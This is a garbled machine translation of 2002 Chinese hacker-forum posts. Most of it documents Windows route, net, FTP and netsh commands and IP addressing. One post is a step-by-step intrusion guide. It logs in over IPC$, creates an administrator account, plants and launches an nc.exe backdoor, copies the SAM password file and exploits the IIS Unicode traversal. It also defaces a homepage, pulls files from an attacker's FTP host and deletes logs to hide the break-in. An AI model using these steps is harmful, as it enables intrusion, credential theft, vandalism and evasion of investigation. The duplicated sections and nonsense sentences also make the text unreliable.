Gateway Specifies Gateway. (Specify Gateway) Interface The Interface Number for the Specified Route. Metric, IE. Cost for the Destination. (Specifying the number of hops)

All symbolic names used for destination are looked up in the network database file NETWORKS. The symbolic names for gateway are looked up in the host name database file HOSTS.If the command is PRINT or DELETE. Destination or gateway can be a wildcard, (wildcard IS specified as a star '*'), or the Gateway Argument May Be omitted. (NetWorks) is quoted in a computer name database file named hosts. If the command is Print or delete, objects and gateways can also use wildcards, or omit the gateway parameters) II. Instance This command is not very suitable, for example, explain.

1.tracert -d http://www.sina.com.cn/ Display all routes through the MY Host to http://www.sina.com.cn/. There is a route of 11 routes. 2. Display the current item in the routing table: c: /> Route print ================================== ============================================= interface list .............................. and NetStat -R shows the result of routing information. 3. Add the routing item to the routing table: Route add hypothesis: Sina's IP address is 61.145.113.87, we arrive at 11 routing, we started to find the host, explaining the white point is the ip of broiler is xxx .xxx.xxx.xxx, subnet mask is 255.255.255.224. We can achieve our goal:

Route Add 61.145.113.87 mask 255.255.255.224 xxx.xxx.xxx.xxx metric 11

4. Modify the traffic route: Route Change This parameter can change the transmission route of the data, but cannot change the destination of the data. The same truth, we can choose a shorter path to access. For example, we just let it go to the Sina.com, now I don't want to be bent so much. Then do the following: route add 61.145.113.87 mask 255.255.255.224 61.187.255.81 metric 4 four routes, of course route is much faster than eleven, is not it?

5. Remove the route from the routing table: Route Delete

Tsupported in Windows 95. (This parameter is used with the add command, the route will last for a long time between the system boot program. By default, the system does not retain the route when the system is restarted. When used with the print command, the registered HSL. Ignore all other commands that always affect the respective persistent routes. This option does not support under Win95) Command One of these: Print Prints A Route (Print Routing) Add Adds A Route (add route) deletes A Route (delete route) CHANGE Modifies an existing route (modify existing routes) destination Specifies the host. (specified host) mASK Specifies that the next parameter is the 'netmask' value. netmask Specifies a subnet mask value for this route entry.If not specified, it defaults to 255.255.255.255. (specify the subnet mask associated with the routing entries. If not specified, will use 255.255.255.255) gateway Specifies gateway. (designated gateway) interface the interface number for the specified route. Metric Specifies The Metric, IE. Cost for the Destination. (Specify the number of hops)

All Symbolic Names Used ---------------------------------------------- ------------ author: tiger date: 2002-11-09 content: net this command syntax is: commands available include: NET ACCOUNTS NET HELP NET SHARE NET COMPUTER NET HELPMSG NET START NET CONFIG NET LOCALGROUP NET STATISTICS NET Config Server Net Name Net Time Net Continue Net Print Net Use Net File Net The Net Help Services lists the web services that users can start. NET HELP SYNTAX explains how to read NET HELP grammar lines. NET HELP Command More is used to display help on one screen. A.Net View The syntax of this command is: Net View [computername / domain [: domainname]] NET View / Network: NW [computename] NET View is used to display a list of shared resources on a computer. When you use this command without an option, it displays a list of current domains or networks on the network. Computername refers to a computer that the user wants to browse its shared resources. / Domain: domainname Specifies the domain where the user wants to browse the valid computer. If the domain name is omitted, all domains on the local area network will be displayed. / Network: NW Displays all available servers on the NetWare network. If you specify a computer name, you will display the available resources on the computer in the NetWare network. As for example, you know a remote computer ***. ***. **. *** has a resource sharing, then run net view ***. ***. **. *** The syntax of the B.NET USE this command is: Net Use [DeviceName *] [ComputerNamesharName "[volume] [password *]] [/ user: [domainname] username] [[/ delete] [/ persistent: {yes no}] ] NET USE [DeviceName *] [Password *]] [/ home] NET USE [/ persistent: {yes no}] NET USE is used to connect the computer to a shared resource, or turn off the connection of the computer and shared resources. When you use this command without an option, it lists the connection to your computer. DeviceName Specifies a name to connect with the resource, or specify the device to be cut.

There are two types of device names: Disk drives (D: to Z :) and printers (LPT1: to LPT3 :). Enter an asterisk instead of a specified device name to allocate the next available device name. ComputerName refers to the name of the computer that controls the shared resource. If the computer name contains an empty character, you should enclose the double reverse slope () and the computer name with quotation marks (""). The computer name can have 1 to 15 characters. ShareName refers to the network name of the shared resource. Volume Specifies the NetWare volume on a server. Users must install NetWare's Customer Service (Windows NT Workstation) or NetWare's gateway service (Windows NT server) and connect to the NetWare server. Password refers to the password required to access the shared resource. * Perform a password prompt. When you enter a password at the password prompt, the password is not displayed. / User specifies a different username when the connection is connected. DomainName Specifies another domain. If the default domain, the current login domain will be used. UserName Specifies the username of the login. / HOME connects users to their host directory. / DELETE Cancels a network connection and deletes the connection from the permanent connection list. / Persistent controls the use of a permanent network connection. Its default is the most recently used settings. YES Saves them when the connection is generated and restores them when logging in. NO does not save the connection or subsequent connection being generated; the existing connection will be recovered at the next login. You can use the / delete option switch to delete permanent connections. NET STATISTICS NET Config Server Net Name Net STOP NET Config Workstation Net Pause Net The Net Continue Net Print Net The Net SESSION NET VIET NET HELP Services lists the web services that users can start. NET HELP SYNTAX explains how to read NET HELP grammar lines. NET HELP Command More is used to display help on one screen. A.Net View The syntax of this command is: Net View [computername / domain [: domainname]] NET View / Network: NW [computename] NET View is used to display a list of shared resources on a computer. When you use this command without an option, it displays a list of current domains or networks on the network. Computername refers to a computer that the user wants to browse its shared resources. / Domain: domainname Specifies the domain where the user wants to browse the valid computer. If the domain name is omitted, all domains on the local area network will be displayed. / Network: NW Displays all available servers on the NetWare network. If you specify a computer name, you will display the available resources on the computer in the NetWare network.

As for example, you know a remote computer ***. ***. **. *** has a resource sharing, then run net view ***. ***. **. *** The syntax of the B.NET USE this command is: Net Use [DeviceName *] [ComputerNamesharName "[volume] [password *]] [/ user: [domainname] username] [[/ delete] [/ persistent: {yes no}] ] NET USE [DeviceName *] [Password *]] [/ home] NET USE [/ persistent: {yes no}] NET USE is used to connect the computer to a shared resource, or turn off the connection of the computer and shared resources. When you use this command without an option, it lists the connection to your computer. DeviceName Specifies a name to connect with the resource, or specify the device to be cut. There are two types of device names: Disk drives (D: to Z :) and printers (LPT1: to LPT3 :). Enter an asterisk instead of a specified device name to allocate the next available device name. ComputerName refers to the name of the computer that controls the shared resource. If the computer name contains an empty character, you should enclose the double reverse slope () and the computer name with quotation marks (""). The computer name can have 1 to 15 characters. ShareName refers to the network name of the shared resource. Volume Specifies the NetWare volume on a server. Users must install NetWare's Customer Service (Windows NT Workstation) or NetWare's gateway service (Windows NT server) and connect to the NetWare server. Password refers to the password required to access the shared resource. * Perform a password prompt. When you enter a password at the password prompt, the password is not displayed. / User specifies a different username when the connection is connected. DomainName Specifies another domain. If the default domain, the current login domain will be used. UserName Specifies the username of the login. / HOME connects users to their host directory. / DELETE Cancels a network connection and deletes the connection from the permanent connection list. / Persistent Control ----------------------------------------------- ----------- author: tiger date: 2002-11-09 content: hacking of several commonly used commands are generally required if poorly written and do not laugh ah. I don't think it is more useful, and I will not write some unrealistic articles like others. Of course, this is just my thoughts, I also have a shortcomings. 1: Net

As long as you have an IP username and password, then connect it with IPC $!

Here us if the user you get is HBX, the password is 123456. Suppose the other party IP is 127.0.0.1

NET use //127.0.0.1/IPC $ "123456" / user: "HBX" exits the command is

Net use //127.0.0.1/ipc $ / delte

The following operations You must use it after login. The method of logging in is above.

----------------------

Below we are telling how to create a user, because SA's permissions are equivalent to the system's superuser.

We add a Heibai user password for lovchina

NET User Heibai LoveChina / Add

As long as the command is displayed, then we can join him to the Administrator group.

NET localgroup administrators heibai / add

----------------------

Here is the C disk that is mapped to the other party. Of course, other disc can also, as long as there is, we will map the other C disk to the local Z disk.

Net use z: //127.0.0.1/C $

----------------------

Net Start Telnet

This will open the other party's Telnet service.

----------------------

Here is to activate the guest user, Guest is the default user of NT, and cannot be deleted? I don't know if I am, my 2000 is deleted.

NET User Guest / Active: YES

----------------------

Here is to change the password of a user, we change the password of the guest to LoveChina, and other users can also. As long as there is permission!

NET User Guest LoveChina

The NET command is really powerful!

2: AT

Generally, an intruder will leave the back door after the invasive invasion, that is, the Trojans, you have passed the Trojan, how to start him?

Then you need AT commands, here you have already logged in that server.

You first have to get the other party,

Net Time //127.0.0.1

Will return a time, here you assume the time is 12: 1, now you need to create a job, its ID = 1

AT //127.0.0.1 12: 3 nc.exe

It is assumed here, named nc.exe, this thing is on the other party.

Here is the NC, NC is a referusion of Netcat, in order to facilitate input, it is generally changed. It is a Telnet service with a port 99.

Wait until 12: 3 can be connected to the 99 port of the other party. This gives the other party to the Trojan.

3: Telnet

This command is very practical, it can be connected to the distance, but the password is required, but the user, but you give the other side Trojans, directly connect to the port of this Trojan.

Telnet 127.0.0.1 99

This will connect to the 99 port of the other party. Then you can run the command in the other party, this is the broiler.

4: FTP

It can pass your things to the other party, you can apply for a space that supports FTP uploads, how much domestic is, if you can't find it, I will give a www.51.net, not bad. When we apply After finishing,? .., and FTP servers.

Before you upload, you need to log in first. Here we assume that the FTP server is www.51.net, the username is hucjs, the password is 654321

FTP http://www.51.net/

He will ask the user to enter the password after successful.

----------------------

Let's talk about it first, assume that the file you need to upload is index.htm, which is located in C: / Under, to the other party D: /

PUT C: /Index.htm D: /

Suppose you want to put the index.htm under each other C, down to your Motor's D

Get c: /index.htm d: /

5: COPY

The next seizure of Deng Ji, the brilliance, the army, the army, the bold, the banana garden, lie first, scorpion, the PC, the PC, the connection is valid.

Here we copied the index.htm under the local C drive to the 127.0.0.1 C drive

Copy Index.htm //127.0.0.1/c $/index.htm ----------------------

If you want to copy it to d, you will line it!

Copy Index.htm //127.0.0.1/d $/index.htm

----------------------

If you have to copy him to the Winnt directory

Just put the input

Copy Index.htm //127.0.0.1/admin $/index.htm

Admin $ is Winnt

----------------------

To copy the other party's file, tell you the backed up of the backup of NT, put in x: /winnt/repair/sam._ Sam._ is the file name of the database

Copy 127.0.0.1 database of 127.0.0.1 to the local C

Copy //127.0.0.1/admin is there/repair/sam._ c: /

----------------------

6: SET

If you ran into a machine, and think about black he (this idea can only be quasi, of course, his 80 port is going to open, or you will show it. You need to use the set command!

Here is the result I got! Let me analyze it, just find the homepage there.

COMPUTERNAME = PENTIUMII ComSpec = D: /WINNT/system32/cmd.exe CONTENT_LENGTH = 0 GATEWAY_INTERFACE = CGI / 1.1 HTTP_ACCEPT = * / * HTTP_ACCEPT_LANGUAGE = zh-cn HTTP_CONNECTION = Keep-Alive HTTP_HOST = current IP Lander, where the show was originally my IP, was I deleted HTTP_ACCEPT_ENCODING = gzip, deflate HTTP_USER_AGENT = Mozilla / 4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS = 1 Os2LibPath = D: / WINNT / system32 / os2 / dll; OS = Windows_NT Path = D: / Winnt / System32; D: / WinNT PATHEXT = .com; .exe ;.bat; .cmd path_translated = E: / VLROOT home page is put on, as long as you see the storage address of the home page after you see Path_Translated =. Here E: / vlroot PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0303 PROMPT = $ P $ G QUERY_STRING = / c set REMOTE_ADDR = XX.XX.XX.XX REMOTE_HOST = XX .XX.XX.XX REQUEST_METHOD = GET SCRIPT_NAME = / scripts /..% 2f ../ winnt / system32 / cmd.exe SERVER_NAME = XX.XX.XX.XX SERVER_PORT = 80 SERVER_PORT_SECURE = 0 SERVER_PROTOCOL = HTTP / 1.1 SERVER_SOFTWARE = Microsoft-IIS / 3.0 other party uses IIS / 3.0 SystemDrive = D: SystemRoot = D: / Winnt Tz = GMT-9 UserProfile = D: / WinNT / Profiles / Default User WINDIR = D: / Winnt Pink That is the other home page Store the address, tell everyone a skill, very stupid skills, but only use this method to find the name of the home page, when you dir this directory, you will see a lot of files, you can put all the files The browser enters the XX.xx.xx.xx / file name so that just see the same plane as XX.xx.xx.xx, then this is the name of the home page.

7: NBTSTAT

If you sweep away from a NT machine, his 136 to 139 one of the ports open, you have to use this command to get the user. By the way, this is NetBIOS. After getting the user name, you can guess the password. For example, a relatively simple password, password, and user name, all try, can't make a crack!

Nowadays, there are many NT machines that open these ports. You can practice, we will analyze the results.

Command

NBTSTAT -A XXX.XXX.XXX.XXX

-A must be capitalized.

The following is the result.

NetBIOS Remote Machine Name Tablename Type Status ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ - Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN < 1B> Unique Pentiumii <03> UNIQUE INET ~ SERVICES <1C> Group is ~ Pentiumii ... <00> UNIQUE ORAHOTOWN <1E> Group ORAHOTOWN <1D> UNIQUE ..__ msbrowse __. <01> group

Pink is the user who landed in this system. Maybe you don't know how to see, everyone is seeing a number, as long as this number is <03>, then his front is the user.

The user here is Pentiumii.

8: Shutdown

Close the command of the other party NT server

Shutdown // IP address T: 20

After 20 seconds, the NT is automatically turned off, and then the order can be run after 20 seconds, so that the other party has a big loss, be a conscience.

9: DIR

This command has nothing to say, but it is very important, he is all the files in a directory, folder.

You can try it locally.

10: echo

The famous vulnerability Unicode, this command can be simple in black with this vulnerability host.

We assume that we have to take the "Nanjing Massacre" such as mountains, any Japanese must not be relied! "

Echo Nanjing Massacre is a mountain, any Japanese must not redeer! > index.htm

Echo Nanjing Massacre is a mountain, any Japanese must not redeer! >> INDEX.HTM

The first meaning is to cover the original content of index.htm, and the "Nanjing Massacre" is like a mountain, any Japanese must not rely on! "Write into index.htm.

The second means is to put "Nanjing Massacre, the mountain, any Japanese, no redeenchar!" Add it inside index.htm.

">>" The resulting content will be added in the document, ">" override the original file content.

Everyone can try it locally.

Maybe you will ask, so simple black, in fact, he can be used to download the homepage to the other party's directory.

1. First, we need to apply for a free home page.

2. Use echo to establish a TXT file with the following content: (as the chinren server as an example.) Open upload.chinaren.com (your space provides your space for your space for you) cnhack (you Username at the time of application) TEST (password when you apply) get index.htm c: /inetpub/wwroot/index.htm (here you download INDEX.HTM on your space to C: / INETPUB / WWWROOT / INDEX.HTM) BYE (exiting FTP dialog, quite DOS under 98, exit DOS with EXIS) Specific practice: Enter echo open upload.chinaren.com> c: /cnhack.txt Enter Echo CNHACK >> C: / CNHACK .txt Enter Echo 39Abs >> C: /CNHACK.TXT Enter Echo get index.htm c: /inetpub/wwwroot/index.htm >> C: /CNHACK.TXT Last input ftp -s: c: /cnhack.txt (Use the FTP-S parameter, execute the content in the file.)

When the command is completed, the file has been downloaded to the file you specified.

Note: After obtaining the file, please delete CNHACK.TXT. (If you don't delete it, it is easy to see your password to others.)

Remember to del C: /cnhack.txt

11: Attrib

This command is to set the file properties. If you want to black a station, and his file's file attribute sets only read, it is very pitiful, you can't do it, you can't do it. inverted! However, this order is not afraid.

Attrib -r index.htm

This command is removed from the read-only attribute of index.htm.

If "-" is changed to " ", the property of this file is set to read-only.

----------------------

Attrib R index.htm

This command is set to read only the property of index.htm.

12: DEL

When you see this title, don't fall! Now I have to leave 127.0.0.1, I want to delete the log, of course, I want to delete the log! Want to be caught. Ha ha.

NT log has these

Del C: / Winnt / System32 / logfiles /*.* Del C: / WinNT / SSYTEM32 / Config / *. EVT DEL C: / WinNT / System32 / DTCLOG / *. - DEL C: / Winnt / System32 / *. log Del C: / Winnt / System32 / *. TXT DEL C: / WinNT / *. TXT DEL C: / WinNT / *. log

Ahotown <1B> Unique Pentiumii <03> Unique INET ~ Services <1c> Group is ~ Pentiumii ... <00> Unique Orahotown <1e> Group Orahotown <1D> Unique ..__ msbrowse __. <01> group

Pink is the user who landed in this system. Maybe you don't know how to see, everyone is seeing a number, as long as this number is <03>, then his front is the user.

The user here is Pentiumii.

8: Shutdown

Close the command of the other party NT server

Shutdown // IP address T: 20

After 20 seconds, the NT is automatically turned off, and then the order can be run after 20 seconds, so that the other party has a big loss, be a conscience.

9: DIR

This command has nothing to say, but it is very important, he is all the files in a directory, folder.

You can try it locally.

10: echo

The famous vulnerability Unicode, this command can be simple in black with this vulnerability host.

We assume that we have to take the "Nanjing Massacre" such as mountains, any Japanese must not be relied! "

Echo Nanjing Massacre is a mountain, any Japanese must not redeer! > index.htm

Echo Nanjing Massacre is a mountain, any Japanese must not redeer! >> INDEX.HTM

The first meaning is to cover the original content of index.htm, and the "Nanjing Massacre" is like a mountain, any Japanese must not rely on! "Write into index.htm.

The second means is to put "Nanjing Massacre, the mountain, any Japanese, no redeenchar!" Add it inside index.htm.

">>" The resulting content will be added in the document, ">" override the original file content.

Everyone can try it locally.

Maybe you will ask, so simple black, in fact, he can be used to download the homepage to the other party's directory.

1. First, we need to apply for a free home page.

Specific practice: Enter echo open upload.chinaren.com> c: /cnhack.txt Enter Echo CNHACK >> C: /CNHACK.TXT Enter Echo 39Abs >> C: /CNHACK.TXT Enter Echo Get Index.htm C: / INETPUB / WWWROOT / INDEX.HTM >> C: /CNHACK.TXT Last input ftp -s: c: /cnhack.txt (using FTP -s parameter, the content in the execution file.)

When the command is completed, the file has been downloaded to the file you specified.

Note: After obtaining the file, please delete CNHACK.TXT. (If you don't delete it, it is easy to see your password to others.)

Remember to del C: /cnhack.txt

11: Attrib

Attrib -r index.htm

This command is removed from the read-only attribute of index.htm.

If "-" is changed to " ", the property of this file is set to read-only.

----------------------

Attrib R index.htm

This command is set to read only the property of index.htm. 12: DEL

When you see this title, don't fall! Now you have to leave 127.0.0.1, you have to delete the log, of course you want to delete the log. ------------------- ------------------------- author: tiger date: 2002-11-09 content: Encyclopedia of FTP commands FTP commands and its application is the most Internet users One of the frequent orders, whether using FTP under DOS or UNIX operating system, will encounter a lot of FTP internal commands, familiar with and flexibly apply the internal commands of FTP, can greatly convenient users, for users now dial-up, if ISP provides shell to use NOHUP, then FTP will be your most money on Download method, FTP command line format is: ftp -v -d -i -n -g [hostname] -v Displays all of the remote server Response information. -D use debugging mode. -N Limits an automatic login of FTP, ie not .NETRC files. -G cancels the global file name. The internal command used by FTP is as follows (where bracket represents optional): 1.! [Cmd [args]] Performs interaction shell in the local machine, EXIT returns to the FTP environment, such as! Ls * .zip. 2. ¥ Macro-AME [ARGS] Perform a macro definition macro-name. 3. Acount [Password] provides the supplementary password required to access the system resource after logging in to the remote system. 4.Appendlocal-file [remote-file] append a local file to a remote system host, if not specified

The remote system file name uses the local file name. 5.ASCII uses the ASCII type transmission mode. 6. Bell Each command is executed, the computer rings once. 7.bin uses binary files. 8. Bye exits the FTP session process. 9.case transfers the uppercase of the remote host file name to lowercase letters when using MGET. 10.CD Remote-Dir enters the remote host directory. 11. CDUP enters the parent directory of the remote host directory. 12.chmod modefile-name Sets the way the remote host file file-name is mode, such as

CHMOD 777 a.out. 13.Close interrupt FTP session with the remote server (corresponding to Open). 14. When CR transmits a file using the ASSCII mode, convert the return line to a back. 15. Delete Remote-file Deletes the remote host file. 16.Debug [debug-value] Set the debug mode, display each command sent to the remote host, such as DEBU P3, if set to 0, indicates canceling the debug. 17.DIR [remote-dir] [local-file] Displays the remote host directory and stores the result to local-file. 18.Disconnection with a Close. 19.Form Format Sets the file transfer mode to Format, defaults to File mode. 20.GetRemote-file [local-file] Transfers the remote host file Remote-File to local-file of the local hard drive. 21.Glob Sets the file name extension of MDelete, MGET, MPUT, and does not extend the file name, the -g parameter with the command line is not expanded. 22. Hash is transmitted 1024 bytes per transmitted, showing an HASH symbol (#). 23.Help [cmd] Displays help information for the FTP internal command CMD, such as Help Get. 24.idle [Seconds] Sets the sleep timer of the remote server to [Seconds] seconds. 25. Setting the binary transmission mode (with binary) 26.lcd [dir] Switch the local working directory to DIR. 27.ls [remote-dir] [local-file] Displays the remote directory Remote-Dir and stores local Loca L-file. 28. MacDef Macro-Name Defines a macro, when you encounter a blank line under MacDef, the macro definition ends. 29.mdelete [remote-file] Deletes remote host files. 30. Mdir Remote-Files Local-file is similar to DIR, but multiple remote files can be specified, such as MDI R * .o. *. Zipoutfile. 31.Mget Remote-files Transport multiple remote files. 32.mkdir Dir-Name built a directory in the remote host. 33.mls Remote-file local-file with nList, but can specify multiple file names. 34.Mode [Mode-Name] sets the file transfer mode to Mode-name, default is a Stream mode. 35.Modtime file-name Displays the final modification time of the remote host file. 36. MPUT local-file transfer multiple files to the remote host. 37.Newerfile-name If the modification time of the file-name in the remote machine is more than the local hard drive

Time is closer, then retransmit the file. 38.nlist [remote-dir] [local-file] Displays the file list of the remote host directory and stores local-file of the local hard drive. 39.NMAP [InPatternOutPattern] Set the file name mapping mechanism, make the file transfer, some characters in the file mutual conversion, such as NMAP ¥ 1. ¥ 2. ¥ 3 [¥ 1, ¥ 2]. [¥ 2, ¥ 3 ], When the file A1.A2.A3 is transferred, the file name is changed to A1, A2, which is especially suitable for the case where the remote host is non-U-NIX machine. 40.ntrans [incharsion [Outchars]] Sets the translation mechanism for file name characters, such as NTRANS1R, then file

Name LL L will become RRR. 41.Open Host [Port] establishes the specified FTP server connection to specify the connection port. 42. Passive enters the passive transmission method. 43.Prompt Sets the interaction tips when multiple file transfer. 44.Proxyftp-cmd In the secondary control connection, execute an FTP command, which allows two FT P servers to transfer files between two servers. The first FTP command must be Open to build a connection between the two servers first. 45.Put local-file [remote-file] Transfer local file local-file to the remote host.

46.PWD Displays the current working directory of the remote host. 47.quit with BYE, exit the FTP session. 48. quote Arg1, Arg2 ... Send parameters to remote FTP servers, such as Quote Syst. 49.Recv remote-file [local-file] with get. 50.RegetRemote-file [local-file] is similar to get, but if local-file exists,

Secondary transmission interruption resume. 51.Rhelp [cmd-name] requests the help of the remote host. 52.RSTATUS [file-name] If the file name is not specified, the status of the remote host is displayed, otherwise the file is displayed.

status. 53.Rename [from] [to] Change the remote host file name. 54.Reset Clear the queue. 55.Restart Marker Restart GET or PUT from the specified flag Marker, such as Restart 130.

56.Rmdir Dir-Name Deletes the remote host directory. 57.Runique Settings File Name Unique Store, if the file exists, then add the suffix after the original file. 58.send local-file [remote-file] with the PUT. 59.Sendport sets the use of the port command. 60.Site Arg1, Arg2 ... Send the parameters as the site command to the remote FTP host. 61.Size file-name Displays the remote host file size, such as Site Idle 7200. 62.Status displays the current FTP state. 63.Struct [struct-name] sets the file transfer structure to struct-name, using the Stream structure when default. 64. Sunique Set the remote host file name storage to unique (corresponding to Runique). 65.System Displays the operating system type of the remote host. 66.TENEX Sets the file transfer type to the TENEX machine. 67.Tick Set the byte counter at the time of transfer. 68.Trace Setup Package. 69.Type [type-name] Setting the file transfer type to type-name, default is ASCII, such as TypeBinary, set binary transfer mode. 70.umask [newmask] sets the default umask of the remote server to NewMask, such as umask 3. 71.UserUser-name [password] [account] indicates that his identity is indicated by the remote host, requiring a password

When you must enter a password, such as User Anonymous My @ Email. 72.verbose's -v parameter with the command line, that is, set a detailed report method, all responses to the FTP server will

Displayed to the user, default is ON. 73.?[cmd] with HELP. So how do you apply these commands to improve efficiency? Let me give an example, how to use FTTP for background

Download, assume your ISP to provide you with the shell and you can use NOHUP, you want to download a 30M program by fttp.download.com/pub/internet/ The specific steps are as follows: 1. Do a file with notepad such as AAA1 The content is as follows Open ftp.dwonload.com user anonymous zyz@cenpok.net CD / Pub / Internet / I get aaa.zip close bye 2. Dial-up login to your ISP. Log in to the shell with Telnet or NetTerm, usually in your HOM E subdirectory BBS ~ / 3. Upload the AAA1 to ISP Server your subdirectory with FTTP. 4. Execute NoHUP FTTP -INVD AAA2 & this process is placed in the background of the ISP server. If you want to know how the situation can, you can know how the situation is. At this time, you can disconnect or dry, estimate time (Time about 30m / ((33.6k / 9) s) dial, more AAA2 If the display successfully downloads AAA.zip, it means AAA.zip has been downloaded. To the ISP server, you will be quite right with the ISP server, remember to download the DEL drop, you will be wasting the ISP resource, it will turn off the shell. Interaction tips at the time of transmission. 44.Proxyftp-cmd In the secondary control connection, execute an FTP command, which allows two FT P servers to transfer files between two servers. The first FTP command must be Open to build two services first.

The connection between the device. 45.Put local-file [remote-file] Transfer local file local-file to the remote host.

status. 53.Rename [from] [to] Change the remote host file name. 54.Reset Clear the queue. 55.Restart Marker Restart GET or PUT from the specified flag Marker, such as Restart 130.

56.Rmdir Dir-Name Deletes the remote host directory. 57.Runique Settings File Name Unique Store, if the file exists, then add the suffix after the original file. 58.send local-file [remote-file] with the PUT. 59.Sendport sets the use of the port command. 60.Site Arg1, Arg2 ... Send the parameters as the site command to the remote FTP host. 61.Size file-name Displays the remote host file size, such as Site Idle 7200. 62.Status displays the current FTP state. 63.Struct [struct-name] sets the file transfer structure to struct-name, using the Stream structure when default. 64. Sunique Set the remote host file name storage to unique (corresponding to Runique). 65.System Displays the operating system type of the remote host. 66.TENEX Sets the file transfer type to the TENEX machine. 67.Tick Set the byte counter at the time of transfer. 68.Trace Setup Package. 69.Type [type-name] Setting the file transfer type to type-name, default is ASCII, such as TypeBinary, set binary transfer mode. 70.umask [newmask] sets the default umask of the remote server to NewMask, such as umask 3. 71.UserUser-name [password] [Account] indicates that your identity is indicated by the remote host, and you must enter a password, such as user anonymous my @ email. 72.verbose's -v parameter with the command line, that is, set a detailed report method, all responses to the FTP server will

Displayed to the user, default is ON. 73.?[cmd] with HELP. So how do you apply these commands to improve efficiency? Let me give an example, how to use FTTP for background

Download, assume your ISP to provide you with the shell and you can use NOHUP, you want to download a 30M program by fttp.download.com/pub/internet/ The specific steps are as follows: 1. Do a file with notepad such as AAA1 The content is as follows Open ftp.dwonload.com user anonymous zyz@cenpok.net CD / Pub / Internet / I get aaa.zip close bye 2. Dial-up login to your ISP. Log in to Shell with Telnet or NetTerm, generally in your HOM E subdirectory bbs ~ / --------------------------- ----------------------------- author: tiger date: 2002-11-09 content: Microsoft's Windows family from Windows NT to start cross In the market of the network operating system, the current Windows 2000 can be said that the network function is gradually improved. In this growth process, Windows integrates the functions of many other network operating systems, which can be said to be borrowed. A complete network operating system, which is also the reason why Sun and other companies feel dissatisfied, I feel that Microsoft is completely developed. However, Windows2000's function is indeed very powerful, it can hardly do a lot of work in the command line like UNIX and Linux. Let's take a look at the last command to change the IP address in the command line. After reading this command, everyone may feel that this command is very like unix and Linux commands, more like Cisco's router command. Below is an echo I actually operate on the computer, I will add some comments: c: /> ipconfig (first use ipconfig this command to see the previous IP address)

Windows 2000 IP ConfigurationEthernet Adapter Local Connection:

Subs.............................................................................. 192.168.0.1

PPP Adapter dial-up connection:

............................................................................................................................................................................................................................................................................................ 211.149.128.147

C: /> Netsh (then execute netsh this command) Netsh> interface (subcommand of netsh command) Interface> IP (subcommand of the interface command) Interface IP> set (subcommand of the interface IP command)

The following instructions are valid:

Commands in this context: set address - Set the IP address or default gateway of the specified interface. SET DNS - Sets DNS server mode and address. SET WINS - Sets WINS Server Mode and Address. Interface IP> Set Address "Local Connection" Static 192.168.0.2 255.255.255.0 192.168.0.1 1 (Setting IP Address) OK.

(Note: The above is like a command that is not like Cisco.)

Interface IP> EXIT

C: /> ipconfig (After the change, use the ipconfig command to see the IP address, confirm if the change is successful)

Windows 2000 IP Configuration

Ethernet Adapter Local connection:

..................................................................: 255.255. 192.168.0.1

PPP Adapter dial-up connection:

C: />

Netsh This command has a lot of powerful features as follows:

C: /> Netsh Netsh>?

The following instructions are valid:

The commands in this context: .. - Move to the previous layer. ? - Display the list of commands. AAAA - Change to `aaaa '' context. Abort - Discard changes made in offline mode. Add - Add a configuration item to the project list. Alias - Add a alias bye - exiting the program. Commit - Submit changes made in offline mode. Delete - Delete a configuration item on the project list. DHCP - Change to `DHCP '' context. Dump - Displays a configuration script. Exec - Run a script file. Exit - Exit the program. Help - Displays the list of commands. Interface - Change to `Interface '' context. Offline - sets the current mode to offline. Online - sets the current mode to an online. POPD - Open a context from the stack. Pushd - Push the current context into the stack. Quit - Exit the program. RAS - Change to `Ras '' context. Routing - Change to `routing '' context. SET - Update Configuration Settings. Show - Display Information UNALIAS - Delete an alias. WINS - Change to `Wins '' context. The following sub-context available: Routing Interface Ras DHCP Wins Aaaa

If you need more help information for the command, type the command, followed by?

192.168.0.250 (IP before the local connection change) Subnet Mask..................................................................................................................................................

PPP Adapter dial-up connection:

The following instructions are valid:

(Note: The above is like a command that is not like Cisco.)

Interface IP> EXIT

C: /> ipconfig (After the change, use the ipconfig command to see the IP address, confirm if the change is successful)

Windows 2000 IP Configuration

Ethernet Adapter Local connection:

..................................................................: 255.255. 192.168.0.1ppp adapter dial-up connection:

C: />

Netsh This command has a lot of powerful features as follows:

C: /> Netsh Netsh>?

The following instructions are valid:

The commands in this context: .. - Move to the previous layer. ? - Display the list of commands. AAAA - Change to `aaaa '' context. Abort - Discard changes made in offline mode. Add - Add a configuration item to the project list. Alias - Add a alias bye - exiting the program. COMM ------------------------------------------------- --------- author: tiger date: 2002-11-09: ● the IP address on the Internet, each host has a unique address, gateway often have more than one address. The address consists of two parties: the network number and host number. This combination is unique to enable each IP address to represent unique hosts in the Internet. All IP addresses are 32-bit long. The IP address is divided into five categories. It usually uses three types of information A, Class B, Class C, and the performance formats are as follows: address type address form A n.h.h.h b n.n.h.h c n.n.n.h

Where n refers to the network number, the H refers to the host number. N and h are integers greater than 0 less than 256. Since the first byte of the A class address is 0, it is used to indicate the address of the A class address, so the A class addresses can only represent 1 to 126 networks, and each network has 16,000,000 hosts. 0 and 127 have special use. The highest bytes of the B-class and Class C addresses are used to indicate whether the address is B or C address, so the range of the first byte of the class B address is from 128 to 191, and Class C is from 192 to 222. Therefore, Class B address can also represent 64x256 (16,382) networks, each network has 64,000 hosts. There are more than two million networks Class C, while each network has up to 254 hosts. Regarding the D address, it is called a multi-channel broadcast address, which is to group the host, and send a lot of a multi-channel broadcast address. The homage of the same group can be received. In our country, the IP address is assigned by the Academy Network Center and its authorized institution.

● What is "subnet"

If there is a lot of hosts in a network, it will bring many difficulties to management, and make the network settings complicated and easy to make mistakes. In many cases, a network number of a A or B address, which corresponds to such a host, so that one organization or unit is often used. On the other hand, only 254 host numbers in Class C addresses are too small. With the actual situation, a larger network is often divided into several parts, and each part is called one - subnet. At the outside, these subnets still correspond to a complete network number. The approach is to divide the host number portion of the address into two parts of the subnet number and the host number.

